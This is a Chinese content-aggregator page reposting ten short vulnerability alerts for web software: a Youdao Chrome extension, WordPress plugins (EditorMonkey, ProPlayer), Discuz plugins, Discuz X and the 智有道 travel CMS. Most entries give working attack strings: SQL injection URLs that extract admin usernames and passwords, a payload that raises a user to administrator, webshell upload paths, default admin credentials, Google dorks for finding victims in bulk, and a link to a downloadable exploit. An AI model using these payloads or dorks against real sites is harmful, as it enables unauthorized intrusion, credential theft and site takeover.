有道Chrome浏览器划词插件xss漏洞漏洞预警

时间:2022-06-16 05:24:12 其他范文 收藏本文 下载本文

有道Chrome浏览器划词插件xss漏洞漏洞预警(精选10篇)由网友“在树上点歌”投稿提供,下面是小编整理过的有道Chrome浏览器划词插件xss漏洞漏洞预警,欢迎您阅读,希望对您有所帮助。

有道Chrome浏览器划词插件xss漏洞漏洞预警

篇1:有道Chrome浏览器划词插件xss漏洞漏洞预警

简要描述:

有道词典划词翻译(chrome插件),选中特殊构造的文字时,进行划词翻译,并执行了相关代码,

详细说明:

也许你只是想复制以上代码,而选中他们,并不是想划词翻译

有道词典插件版本:1.0

cidian.youdao.com/chromeplus/

漏洞证明:

happytreebb.lofter.com/post/1a143d_51816e

篇2:WordPress插件漏洞0day漏洞预警

其实就是一个fck的洞子,不过有条件的哦,要这个插件EditorMonkey

嘿嘿。

xxxx.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html

upload shell.php.jpg

xxxx.com//UserFiles/shell.php.jpg

篇3:WordPress插件EditorMonkey上传漏洞漏洞预警

WordPress插件EditorMonkey存在上传漏洞,用WINDOWS

系统的请注意哦。这漏洞也就是fckeditor的上传洞。没必要在讲了,

大家在熟悉不过啦。还是自带的编辑器安全一点。

漏洞测试如下:

www.tmdsb.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html

上传什么文件大家多懂的,

上传后文件在www.tmdsb.com/UserFiles/tmdsb.txt

谷歌搜索一下,好多用这插件的博客。

关键字:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html

篇4:wordpress 插件 editormonkey 远程上传漏洞漏洞预警

editormonkey是wordpress的一个后台编辑器插件,

前好多天在inj3ct0r上公布了,也被相继了,个人觉得不是很完美。

都是直接上传得到一个x.php.jpg的shell。

完全可以用FCK的0day直接得到一个phpshell。

GOOGLE dork:inurl:”plugins/editormonkey”

EXP:

Upload a new file:

篇5:Discuz!黑道生涯插件注射漏洞漏洞预警

插件版本:2.2  2.5

注册一个论坛ID

IE提交下面代码

blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/

提升到管理员

discuz7.0.0后台得webshell方法

www.oldjun.com/blog/index.php/archives/48/

如果是discuz6.0 的后台就提交

admincp.php?action=styles&edit=1

最后得到的webshell地址还是forumdata/cache/style_1.php

篇6:WP ProPlayer 插件= 4.7.7 注入漏洞漏洞预警

# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

# Date: -08-05

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: downloads.wordpress.org/plugin/proplayer.4.7.7.zip

# Version: 4.7.7 (tested)

Poc:

www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20

function getPlaylist($id = '') { $query = mysql_query(“SELECT * FROM ”.$this->tablePrefix.“proplayer_playlist WHERE (POST_ID='$id')”); $playlistRow = mysql_fetch_row($query); return $this->withBackwardCompatibility($playlistRow[2]);} ... if (!empty($_GET[“pp_playlist_id”])) { header(“Content-type: application/xml”); $xml = $playlistController->getPlaylist($_GET[“pp_playlist_id”]);

篇7:智有道专业旅游系统 v1.6.5 漏洞漏洞预警

############################################################################

#

# Title: 智有道专业旅游系统 v1.6.5 漏洞

# Time:2011-10-30

# Team:makebugs

# Author: 缘分

############################################################################

注入篇:

t.qq.com/MakeBug

hi.baidu.com/micropoor

'incincsql.asp

<%

dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post

sql_leach = “',and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare”

sql_leach_0 = split(sql_leach,“,”)

If Request.QueryString“” Then

For Each SQL_Get In Request.QueryString

For SQL_Data=0 To Ubound(sql_leach_0)

'略

If Request.Form“” Then

For Each Sql_Post In Request.Form

For SQL_Data=0 To Ubound(sql_leach_0)

if instr(Request.Form(Sql_Post),sql_leach_0(Sql_DATA))>0 Then

Response.Write(“err”)

'略

%>

过滤问题,但是在部分取值的时候:

<%

id=ReplaceBadChar(replace(trim(request(“id”)),“'”,“”)) '注意ID

sql=“select * from car where id=”&id&“”

set rs=server.CreateObject(“ADODB.recordset”)

rs.open sql,conn,1,1

if rs.eof and rs.bof then

'略

end if

%>

其中也有没有过滤的页面,

智有道专业旅游系统 v1.6.5 漏洞漏洞预警

例如:

<%

dim id

id=checkStr(request.QueryString(“id”)&“”)

dim objhttp,strrequest,xmldoc,bok

Set bjHTTP = Server.CreateObject(“MSXML2.XMLHTTP”)

strRequest = “sceneryId=”&id&“”

shell篇:

智有道专业旅游系统1.1--v1.6.5版本都有着同样的问题:

127.0.0.1/admin/do/admin_uploadfile.asp?id=1&dir=../..

127.0.0.1/admin/do/Admin_Style.asp

127.0.0.1/admin/do/data.asp

其他信息:

数据库默认:wklksdatabbcctour.asp 可考虑插入一句话

上传问题:incUpfile_Photo.asp

篇8:智有道专业旅游系统 v1.0 漏洞漏洞预警

默认信息:

“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!

后台管理

后台路径:admin/login.asp

管理员:user:admin

密码:psw:123456

下载地址:down.chinaz.com/soft/30295.htm

Demo Url:will.w701.hzdemo.cn/

exp:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin

或者:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin

遍历目录:

www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..

其它:

www.0855.tv/admin/do/Admin_Style.asp

www.0855.tv/admin/do/data.asp

关键字:

为防批量,特略,

智有道专业旅游系统 v1.0 漏洞漏洞预警

篇9:Discuz!账号发放插件注入0day漏洞预警

Discuz!账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统

漏洞文件:2fly_gift.php

版本:最新版

Exp:www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members

搜索引擎特征:inurl:2fly_gift.php

上图:

篇10:Discuz! X Getshell漏洞EXp(自带插件)漏洞预警

dz0day 公布~

其实咱尖刀内部已经玩废了-,-

顺便膜拜下疯子大牛...

===

在看之前我们首先要像乌云提交的作者致敬,因为是他那个标题才让我们尖刀团队研究出来的,当然如果有人硬是要说抄袭也可以,我们做我们的,你们说你们的,这是我们一贯的风格。

作者:网络尖刀安全团队

#1 这漏洞出现在一个DZ X系列自带的转换工具里面!

漏洞路径:utility/convert/data/config.inc.php

#2 在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!

#3 然后小伙伴们写一半的shell没用,最后尖刀的某个小伙伴说直接修改表单,然后成功!

#4 打开EXP直接修改您需要的网站然后直接点击保存即可,

shell连接utility/convert/data/config.inc.php 密码c

exp链接: pan.baidu.com/s/1kTFib1l 密码: ku87

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

帝国CMS 留言本多字节漏洞漏洞预警

一个防注入的小白错误千博企业程序漏洞预警

详解Chrome浏览器同时登陆多个账号

探讨如何限制Notes用户邮箱大小?Windows系统

安卓应用商店用户调查报告

响应承诺书

防护宝典:预防、判断及阻止流氓软件的方法

跨站脚本漏洞的利用教程

为IE9增彩 搜罗7款适用IE9插件

有道Chrome浏览器划词插件xss漏洞漏洞预警
《有道Chrome浏览器划词插件xss漏洞漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【有道Chrome浏览器划词插件xss漏洞漏洞预警(精选10篇)】相关文章:

FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警2023-08-07

WordPress简单安全设置2022-04-29

科普:小议OAuth 2.0认证缺陷2022-04-29

脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12

如何让电脑免遭网络病毒的危害?2023-07-28

Discuz! X2.5 Beta版发布 供站长体验与测试2022-05-12

求职信病毒的危害2022-08-16

有关观看315晚会的作文:个人的消费理念2023-02-07

FLASHFlash+php+mysql简单留言本制作2022-05-06

上传漏洞终结篇讲解2022-10-05

点击下载本文文档